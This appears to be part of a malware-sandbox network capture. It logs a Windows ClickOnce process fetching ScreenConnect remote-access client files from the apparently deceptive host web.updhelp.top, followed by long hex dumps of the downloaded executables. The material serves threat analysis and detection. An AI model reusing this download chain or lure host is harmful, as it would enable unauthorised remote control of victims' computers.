                                                                                                                  2025-04-12 15:58:13 UTC1369INData Raw: 00 0a 2a 00 00 13 30 02 00 25 00 00 00 12 00 00 11 73 d6 00 00 0a 0a 06 02 7d d7 00 00 0a 06 7b d7 00 00 0a 75 b5 00 00 1b 0b 07 2c 02 07 2a 06 6f d8 00 00 0a 2a 5a 1f fe 73 d9 00 00 0a 25 02 7d da 00 00 0a 25 03 7d db 00 00 0a 2a 5a 1f fe 73 dc 00 00 0a 25 02 7d dd 00 00 0a 25 03 7d de 00 00 0a 2a 26 02 03 17 28 0b 00 00 2b 2a 26 02 03 15 28 0b 00 00 2b 2a 00 13 30 04 00 2d 00 00 00 13 00 00 11 73 df 00 00 0a 0a 06 04 7d e0 00 00 0a 06 03 7d e1 00 00 0a 02 73 cd 00 00 0a 25 06 fe 06 e2 00 00 0a 73 e3 00 00 0a 6f e4 00 00 0a 2a 5a 1f fe 73 e5 00 00 0a 25 02 7d e6 00 00 0a 25 03 7d e7 00 00 0a 2a 13 30 03 00 26 00 00 00 14 00 00 11 73 e8 00 00 0a 0a 06 04 7d e9 00 00 0a 02 03 28 0c 00 00 2b 06 fe 06 ea 00 00 0a 73 eb 00 00 0a 28 0d 00 00 2b 2a 00 00 1b 30
                                                                                                                  Data Ascii: *0%s}{u,*o*Zs%}%}*Zs%}%}*&(+*&(+*0-s}}s%so*Zs%}%}*0&s}(+s(+*0
                                                                                                                  2025-04-12 15:58:13 UTC1369INData Raw: 13 30 02 00 1b 00 00 00 1e 00 00 11 02 6f c8 00 00 0a 03 31 08 02 03 6f c9 00 00 0a 2a 12 00 fe 15 8f 00 00 1b 06 2a 00 1b 30 03 00 58 00 00 00 1f 00 00 11 02 75 2a 00 00 1b 0a 06 2c 15 06 6f c8 00 00 0a 0b 07 16 31 38 06 07 17 59 6f c9 00 00 0a 2a 12 02 fe 15 8f 00 00 1b 02 6f ca 00 00 0a 0d 2b 07 09 6f cb 00 00 0a 0c 09 6f 11 00 00 0a 2d f1 de 0a 09 2c 06 09 6f 10 00 00 0a dc 08 2a 12 04 fe 15 8f 00 00 1b 11 04 2a 01 10 00 00 02 00 2e 00 13 41 00 0a 00 00 00 00 1b 30 03 00 64 00 00 00 20 00 00 11 02 75 2a 00 00 1b 0a 06 2c 1a 06 6f c8 00 00 0a 0b 07 2d 06 73 04 01 00 0a 7a 06 07 17 59 6f c9 00 00 0a 2a 12 02 fe 15 8f 00 00 1b 16 0d 02 6f ca 00 00 0a 13 04 2b 0a 11 04 6f cb 00 00 0a 0c 17 0d 11 04 6f 11 00 00 0a 2d ed de 0c 11 04 2c 07 11 04 6f 10 00 00
                                                                                                                  Data Ascii: 0o1o**0Xu*,o18Yo*o+oo-,o**.A0d u*,o-szYo*o+oo-,o
                                                                                                                  2025-04-12 15:58:13 UTC1369INData Raw: 7b 33 00 00 04 25 2d 0b 26 12 00 fe 15 3a 00 00 02 06 2a 03 28 43 01 00 06 2a 00 13 30 02 00 19 00 00 00 28 00 00 11 03 75 39 00 00 02 2c 0f 03 a5 39 00 00 02 0a 02 06 28 2c 01 00 06 2a 16 2a 3e 02 7b 33 00 00 04 03 7b 33 00 00 04 fe 01 2a 4a 02 7b 33 00 00 04 25 2d 03 26 16 2a 6f 21 01 00 0a 2a 26 0f 00 03 28 2c 01 00 06 2a 2e 02 03 28 2e 01 00 06 16 fe 01 2a 32 16 73 22 01 00 0a 80 32 00 00 04 2a 1e 02 7b 34 00 00 04 2a 22 02 03 7d 34 00 00 04 2a 1e 02 7b 35 00 00 04 2a 22 02 03 7d 35 00 00 04 2a 8a 02 28 31 01 00 06 2c 19 02 28 33 01 00 06 2c 11 02 28 31 01 00 06 02 28 33 01 00 06 6f 44 01 00 06 2a 13 30 02 00 40 00 00 00 29 00 00 11 73 23 01 00 0a 0a 06 72 8c 03 00 70 6f 24 01 00 0a 26 06 72 c8 03 00 70 6f 24 01 00 0a 26 02 06 28 37 01 00 06 2c 09 06
                                                                                                                  Data Ascii: {3%-&:*(C*0(u9,9(,**>{3{3*J{3%-&*o!*&(,*.(.*2s"2*{4*"}4*{5*"}5*(1,(3,(1(3oD*0@)s#rpo$&rpo$&(7,
                                                                                                                  2025-04-12 15:58:13 UTC1369INData Raw: 0a 02 03 7d 41 00 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 8d 81 00 00 1b 2a 06 2a 2e 73 38 01 00 0a 80 39 01 00 0a 2a 00 00 00 13 30 03 00 53 00 00 00 00 00 00 00 28 16 00 00 2b 80 45 00 00 04 28 3a 01 00 0a 7e 16 05 00 04 fe 06 82 0d 00 06 73 3b 01 00 0a 6f 3c 01 00 0a 28 17 00 00 2b 80 46 00 00 04 28 18 00 00 2b 7e 16 05 00 04 fe 06 83 0d 00 06 73 3d 01 00 0a 28 19 00 00 2b 28 1a 00 00 2b 80 47 00 00 04 2a 00 13 30 03 00 88 00 00 00 00 00 00 00 d0 8f 00 00 1b 28 3e 01 00 0a 28 8d 04 00 06 7e 3f 01 00 0a 25 2d 17 26 7e 40 01 00 0a fe 06 41 01 00 0a 73 42 01 00 0a 25 80 3f 01 00 0a 28 1b 00 00 2b 7e 43 01 00 0a 25 2d 17 26 7e 40 01 00 0a fe 06 44 01 00 0a 73 42 01 00 0a 25 80 43 01 00 0a 28 1b 00 00 2b 7e 15 05 00 04 25 2d 13 26 14 fe 06 45 01 00 0a 73 46
                                                                                                                  Data Ascii: }A*(<***.s89*0S(+E(:~s;o<(+F(+~s=(+(+G*0(>(~?%-&~@AsB%?(+~C%-&~@DsB%C(+~%-&EsF


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.2460858104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:13 UTC99OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  2025-04-12 15:58:14 UTC1093INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:14 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 602392
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.WindowsClient.exe"; filename*=UTF-8''ScreenConnect.WindowsClient.exe
                                                                                                                  CF-Cache-Status: BYPASS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IXdC%2F5V7C4FYK001hqsxFEMEelI4VZ0SNl8blKvjEryrsqv8kqRv%2F6JvULdqKIWjwl8KKf0fR01h3LgAwpniXig98X%2FqAYPA0JzzrkDdkX8%2FiNrU9%2FuXMCiAzwC1EJ5pE1I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec890a87b0a6-ATL
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=105833&min_rtt=105788&rtt_var=22347&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=714&delivery_rate=38136&cwnd=252&unsent_bytes=0&cid=b227803503b5fc5f&ts=1003&x=0"
                                                                                                                  2025-04-12 15:58:14 UTC276INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d0 f8 c2 81 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 00 09 00 00 06 00 00 00 00 00 00 a6 19 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 32 cd 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `2@
                                                                                                                  2025-04-12 15:58:14 UTC1369INData Raw: 00 00 00 00 00 08 09 00 18 29 00 00 00 40 09 00 0c 00 00 00 a8 18 09 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 78 ff 08 00 00 20 00 00 00 00 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 03 00 00 00 20 09 00 00 04 00 00 00 02 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 09 00 00 02 00 00 00 06 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 85 19 09 00 00 00 00 00 48 00 00 00 02 00 05 00 ec 49 03
                                                                                                                  Data Ascii: )@8 H.textx `.rsrc @@.reloc@@BHI
                                                                                                                  2025-04-12 15:58:14 UTC1369INData Raw: 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d 00 00 0a a2 25 17 02 7b 54 00 00 0a 0b 12 01 25 71 35 00 00 1b 8c 35 00 00 1b 2d 04 26 14 2b 0b fe 16 35 00 00 1b 6f 4d 00 00 0a a2 28 4e 00 00 0a 2a 1e 02 7b 55 00 00 0a 2a 1e 02 7b 56 00 00 0a 2a 1e 02 7b 57 00 00 0a 2a 1e 02 7b 58 00 00 0a 2a 1e 02 7b 59 00 00 0a 2a b2 02 28 46 00 00 0a 02 03 7d 55 00 00 0a 02 04 7d 56 00 00 0a 02 05 7d 57 00 00 0a 02 0e 04 7d 58 00 00 0a 02 0e 05 7d 59 00 00 0a 2a 00 13 30 03 00 89 00 00 00 06 00 00 11 03 75 39 00 00 1b 0a 02 06 2e 7c 06 2c 77 28 47 00 00 0a 02 7b 55 00 00 0a 06 7b 55 00 00 0a 6f 48 00 00 0a 2c 5f 28 49 00 00 0a 02 7b 56 00 00 0a 06 7b 56 00 00 0a 6f 4a 00 00 0a 2c 47 28 5a 00 00 0a 02 7b 57 00 00 0a 06 7b 57 00 00 0a 6f 5b 00 00 0a 2c 2f 28 5c
                                                                                                                  Data Ascii: 4-&+4oM%{T%q55-&+5oM(N*{U*{V*{W*{X*{Y*(F}U}V}W}X}Y*0u9.|,w(G{U{UoH,_(I{V{VoJ,G(Z{W{Wo[,/(\
                                                                                                                  2025-04-12 15:58:14 UTC1369INData Raw: 02 7b 67 00 00 0a 6f 4b 00 00 0a 58 20 29 55 55 a5 5a 28 49 00 00 0a 02 7b 68 00 00 0a 6f 4c 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 d2 02 00 70 18 8d 11 00 00 01 25 16 02 7b 67 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d 00 00 0a a2 25 17 02 7b 68 00 00 0a 0b 12 01 25 71 35 00 00 1b 8c 35 00 00 1b 2d 04 26 14 2b 0b fe 16 35 00 00 1b 6f 4d 00 00 0a a2 28 4e 00 00 0a 2a 1e 02 7b 69 00 00 0a 2a 1e 02 7b 6a 00 00 0a 2a 56 02 28 46 00 00 0a 02 03 7d 69 00 00 0a 02 04 7d 6a 00 00 0a 2a 13 30 03 00 41 00 00 00 0b 00 00 11 03 75 43 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 47 00 00 0a 02 7b 69 00 00 0a 06 7b 69 00 00 0a 6f 48 00 00 0a 2c 17 28 49 00 00 0a 02 7b 6a 00 00 0a 06 7b 6a 00 00 0a 6f 4a
                                                                                                                  Data Ascii: {goKX )UUZ(I{hoLX*0brp%{g%q44-&+4oM%{h%q55-&+5oM(N*{i*{j*V(F}i}j*0AuC.4,/(G{i{ioH,(I{j{joJ
                                                                                                                  2025-04-12 15:58:14 UTC1369INData Raw: 72 00 00 0a 6f 4a 00 00 0a 2a 16 2a 17 2a d2 20 ea 82 bb c4 20 29 55 55 a5 5a 28 47 00 00 0a 02 7b 71 00 00 0a 6f 4b 00 00 0a 58 20 29 55 55 a5 5a 28 49 00 00 0a 02 7b 72 00 00 0a 6f 4c 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 9c 05 00 70 18 8d 11 00 00 01 25 16 02 7b 71 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d 00 00 0a a2 25 17 02 7b 72 00 00 0a 0b 12 01 25 71 35 00 00 1b 8c 35 00 00 1b 2d 04 26 14 2b 0b fe 16 35 00 00 1b 6f 4d 00 00 0a a2 28 4e 00 00 0a 2a 1e 02 7b 73 00 00 0a 2a 1e 02 7b 74 00 00 0a 2a 56 02 28 46 00 00 0a 02 03 7d 73 00 00 0a 02 04 7d 74 00 00 0a 2a 13 30 03 00 41 00 00 00 10 00 00 11 03 75 48 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 47 00 00 0a 02 7b 73 00 00 0a 06
                                                                                                                  Data Ascii: roJ*** )UUZ(G{qoKX )UUZ(I{roLX*0brp%{q%q44-&+4oM%{r%q55-&+5oM(N*{s*{t*V(F}s}t*0AuH.4,/(G{s
                                                                                                                  2025-04-12 15:58:14 UTC1369INData Raw: 0a 25 18 6f 96 00 00 0a 25 18 6f 97 00 00 0a 13 05 02 7b 24 00 00 04 07 6f 79 00 00 0a 7b 67 02 00 04 13 06 11 06 45 03 00 00 00 02 00 00 00 0e 00 00 00 1a 00 00 00 de 62 03 11 05 08 09 6f 98 00 00 0a de 56 03 11 05 11 04 28 6f 06 00 06 de 4a 12 04 28 99 00 00 0a 6c 17 28 9a 00 00 0a 23 00 00 00 00 00 00 00 00 36 23 12 04 28 9b 00 00 0a 6c 17 28 9a 00 00 0a 23 00 00 00 00 00 00 00 00 36 0a 03 11 05 11 04 6f 9c 00 00 0a de 0c 11 05 2c 07 11 05 6f 22 00 00 0a dc 07 17 58 0b 07 02 7b 24 00 00 04 6f 77 00 00 0a 3f 46 fe ff ff 02 02 7b 24 00 00 04 6f 77 00 00 0a 7d 25 00 00 04 2a 00 00 01 10 00 00 02 00 5d 01 7e db 01 0c 00 00 00 00 13 30 08 00 f7 00 00 00 13 00 00 11 1a 8d 26 00 00 01 25 16 72 f4 06 00 70 1a 8d 9f 00 00 01 25 16 16 73 9d 00 00 0a 8c ab 00 00
                                                                                                                  Data Ascii: %o%o{$oy{gEboV(oJ(l(#6#(l(#6o,o"X{$ow?F{$ow}%*]~0&%rp%s
                                                                                                                  2025-04-12 15:58:14 UTC1369INData Raw: 0d 12 02 28 cb 00 00 0a 03 7b cc 00 00 0a 59 03 7b cd 00 00 0a 12 02 28 cb 00 00 0a 59 28 ce 00 00 0a 12 02 28 cf 00 00 0a 03 7b d0 00 00 0a 59 03 7b d1 00 00 0a 12 02 28 cf 00 00 0a 59 28 ce 00 00 0a 28 ce 00 00 0a 13 04 04 1a 2e 14 04 1d 2e 10 12 02 28 cb 00 00 0a 03 7b cc 00 00 0a 59 2b 0e 03 7b cd 00 00 0a 12 02 28 cb 00 00 0a 59 11 04 58 13 05 04 1a 2e 14 04 1b 2e 10 12 02 28 cf 00 00 0a 03 7b d0 00 00 0a 59 2b 0e 03 7b d1 00 00 0a 12 02 28 cf 00 00 0a 59 11 04 58 13 06 12 07 07 11 06 12 03 28 d2 00 00 0a 59 28 57 06 00 06 12 03 28 d3 00 00 0a 58 11 06 28 bc 00 00 0a 12 08 11 05 07 11 05 12 03 28 d3 00 00 0a 59 28 58 06 00 06 12 03 28 d2 00 00 0a 58 28 bc 00 00 0a 12 07 28 d3 00 00 0a 11 05 32 04 11 07 2b 02 11 08 13 09 12 09 28 d3 00 00 0a 02 6f d4
                                                                                                                  Data Ascii: ({Y{(Y(({Y{(Y((..({Y+{(YX..({Y+{(YX(Y(W(X((Y(X(X((2+(o
                                                                                                                  2025-04-12 15:58:14 UTC1369INData Raw: 00 00 04 73 93 00 00 06 25 03 6f 92 00 00 06 28 11 00 00 2b 2a 00 13 30 03 00 29 00 00 00 1c 00 00 11 02 7b 30 00 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 03 00 00 1b 0c 02 7c 30 00 00 04 08 07 28 12 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 1c 00 00 11 02 7b 30 00 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 03 00 00 1b 0c 02 7c 30 00 00 04 08 07 28 12 00 00 2b 0a 06 07 33 df 2a 42 20 4a 6b c9 02 28 ec 00 00 0a 80 2b 00 00 04 2a 00 00 13 30 04 00 3a 00 00 00 1d 00 00 11 73 06 07 00 06 0a 06 03 7d 72 02 00 04 06 7b 72 02 00 04 02 28 7f 00 00 06 28 13 00 00 2b 06 fe 06 07 07 00 06 73 ef 00 00 0a 28 14 00 00 2b 28 15 00 00 2b 28 16 00 00 2b 2a a2 02 28 df 00 00 0a 20 80 00 00 00 03 7b f3 00 00 0a 28 ec 00 00 0a 03 7b f4 00 00 0a 6f f5 00 00 0a 28
                                                                                                                  Data Ascii: s%o(+*0){0(t|0(+3*0){0(t|0(+3*B Jk(+*0:s}r{r((+s(+(+(+*( {({o(
                                                                                                                  2025-04-12 15:58:14 UTC1369INData Raw: 05 00 06 6b 73 94 00 00 0a 0a 03 06 02 28 a0 00 00 06 05 28 86 00 00 0a 28 13 01 00 0a 28 14 01 00 0a 6f 15 01 00 0a de 0a 06 2c 06 06 6f 22 00 00 0a dc 2a 00 01 10 00 00 02 00 1d 00 1f 3c 00 0a 00 00 00 00 42 20 1b b2 34 00 28 ec 00 00 0a 80 34 00 00 04 2a 1a 7e 39 00 00 04 2a 1a 7e 3a 00 00 04 2a 1a 7e 3b 00 00 04 2a 00 00 1b 30 07 00 aa 09 00 00 21 00 00 11 02 28 16 01 00 0a 02 73 17 01 00 0a 7d 3c 00 00 04 02 03 72 4e 08 00 70 28 17 00 00 2b 28 af 00 00 06 02 28 ae 00 00 06 7e 97 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 18 07 00 06 73 19 01 00 0a 25 80 97 02 00 04 6f 1a 01 00 0a 02 04 28 ad 00 00 06 02 73 1b 01 00 0a 7d 5e 00 00 04 02 73 1c 01 00 0a 7d 60 00 00 04 02 73 a2 01 00 06 7d 55 00 00 04 02 73 1d 01 00 0a 28 dd 00 00 06 02 18 16 17 16 02 73
                                                                                                                  Data Ascii: ks((((o,o"*<B 4(4*~9*~:*~;*0!(s}<rNp(+((~%-&~s%o(s}^s}`s}Us(s
                                                                                                                  2025-04-12 15:58:14 UTC1369INData Raw: 00 06 a2 25 1b 02 28 be 00 00 06 a2 25 1c 02 28 c0 00 00 06 a2 25 1d 02 28 da 00 00 06 a2 25 1e 02 28 d4 00 00 06 a2 25 1f 09 02 28 d8 00 00 06 a2 25 1f 0a 02 28 d6 00 00 06 a2 25 1f 0b 02 28 c8 00 00 06 a2 25 1f 0c 02 28 ca 00 00 06 a2 25 1f 0d 02 28 cc 00 00 06 a2 25 1f 0e 02 28 ce 00 00 06 a2 25 1f 0f 02 28 e8 00 00 06 a2 25 1f 10 02 28 ea 00 00 06 a2 02 28 c2 00 00 06 28 19 00 00 2b 28 1a 00 00 2b 28 e1 00 00 06 02 73 b5 04 00 06 7d 5a 00 00 04 02 7b 5a 00 00 04 02 fe 06 5f 01 00 06 73 50 01 00 0a 6f bb 04 00 06 02 7b 5a 00 00 04 02 fe 06 60 01 00 06 73 2b 01 00 0a 6f bd 04 00 06 02 7b 5a 00 00 04 02 fe 06 61 01 00 06 73 51 01 00 0a 6f b9 04 00 06 02 73 7e 01 00 06 7d 3d 00 00 04 02 7b 3d 00 00 04 02 fe 06 63 01 00 06 73 2b 01 00 0a 6f 8d 01 00 06 02
                                                                                                                  Data Ascii: %(%(%(%(%(%(%(%(%(%(%(%(((+(+(s}Z{Z_sPo{Z`s+o{ZasQos~}={=cs+o


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.2460859104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:15 UTC116OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-04-12 15:58:16 UTC1057INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:16 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 197120
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.Client.dll"; filename*=UTF-8''ScreenConnect.Client.dll
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NE4cyCs218fTBW%2BjBk%2FE%2BWVcwDaQhYfM7wDqxIZ6d6DEkn3SpZMW3TY6QoErH3Yiwe9tV6ojMOdLCRVpNzfSvPnh%2FgK2hnoR9MU0SliRKQubEvbBOC7TnXSeQEd%2B0JAIRQQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec95eec332fe-JAX
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=112521&min_rtt=112481&rtt_var=23788&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=707&delivery_rate=35858&cwnd=252&unsent_bytes=0&cid=c0887fe7a326c408&ts=925&x=0"
                                                                                                                  2025-04-12 15:58:16 UTC312INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2a f3 5e fc 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 96 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 12 50 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*^" 0 `P@
                                                                                                                  2025-04-12 15:58:16 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 f8 02 00 00 20 00 00 00 fa 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 03 00 00 00 20 03 00 00 04 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 03 00 00 02 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 75 18 03 00 00 00 00 00 48 00 00 00 02 00 05 00 d4 c3 00 00 34 9b 01 00 09 00 00 00 00 00 00 00 08 5f 02 00 18 b8 00 00 20 17 03 00 80 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: H.text `.rsrc| @@.reloc@@BuH4_
                                                                                                                  2025-04-12 15:58:16 UTC1369INData Raw: 02 28 20 00 00 06 0a 12 00 fe 16 1d 00 00 01 6f 29 00 00 0a 28 48 00 00 0a 2a 1e 02 28 49 00 00 0a 2a 1e 02 7b 4a 00 00 04 2a 22 02 03 7d 4a 00 00 04 2a 5a 72 ef 00 00 70 02 28 26 00 00 06 28 33 00 00 0a 28 48 00 00 0a 2a 1e 02 28 49 00 00 0a 2a 1e 02 7b 4b 00 00 04 2a 22 02 03 7d 4b 00 00 04 2a 1e 02 7b 4c 00 00 04 2a 22 02 03 7d 4c 00 00 04 2a 1e 02 7b 4d 00 00 04 2a 22 02 03 7d 4d 00 00 04 2a 1e 02 7b 4e 00 00 04 2a 22 02 03 7d 4e 00 00 04 2a 1e 02 7b 4f 00 00 04 2a 22 02 03 7d 4f 00 00 04 2a 1e 02 28 49 00 00 0a 2a 1e 02 28 49 00 00 0a 2a 1e 02 7b 50 00 00 04 2a 22 02 03 7d 50 00 00 04 2a 1e 02 28 49 00 00 0a 2a 1e 02 28 49 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 1e 02 28 49 00 00 0a 2a 1e 02 7b 54 00 00 04 2a 22 02 03 7d 54 00
                                                                                                                  Data Ascii: ( o)(H*(I*{J*"}J*Zrp(&(3(H*(I*{K*"}K*{L*"}L*{M*"}M*{N*"}N*{O*"}O*(I*(I*{P*"}P*(I*(I*{Q*"}Q*(I*{T*"}T
                                                                                                                  2025-04-12 15:58:16 UTC1369INData Raw: 5e 00 00 0a 0a 06 0b 07 03 28 5b 00 00 0a 74 07 00 00 1b 0c 02 7c 5e 00 00 0a 08 07 28 0d 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 0a 00 00 11 02 7b 5e 00 00 0a 0a 06 0b 07 03 28 5d 00 00 0a 74 07 00 00 1b 0c 02 7c 5e 00 00 0a 08 07 28 0d 00 00 2b 0a 06 07 33 df 2a 42 02 03 6f 5f 00 00 0a 2c 06 02 28 60 00 00 0a 2a 6e 02 7b 58 00 00 0a 6f 61 00 00 0a 8c 71 00 00 1b 25 2d 02 26 2a 6f 62 00 00 0a 2a 0a 17 2a 4e 02 02 7b 5a 00 00 0a 03 73 63 00 00 0a 28 0e 00 00 2b 2a 46 02 02 7b 5e 00 00 0a 16 28 65 00 00 0a 16 fe 01 2a 00 1b 30 04 00 c6 00 00 00 0b 00 00 11 73 66 00 00 0a 0a 06 02 7d 67 00 00 0a 06 03 7d 68 00 00 0a 06 73 69 00 00 0a 7d 6a 00 00 0a 38 8c 00 00 00 02 7b 58 00 00 0a 06 7b 6b 00 00 0a 25 2d 16 26 06 06 fe 06 6c 00 00 0a 73
                                                                                                                  Data Ascii: ^([t|^(+3*0){^(]t|^(+3*Bo_,(`*n{Xoaq%-&*ob**N{Zsc(+*F{^(e*0sf}g}hsi}j8{X{k%-&ls
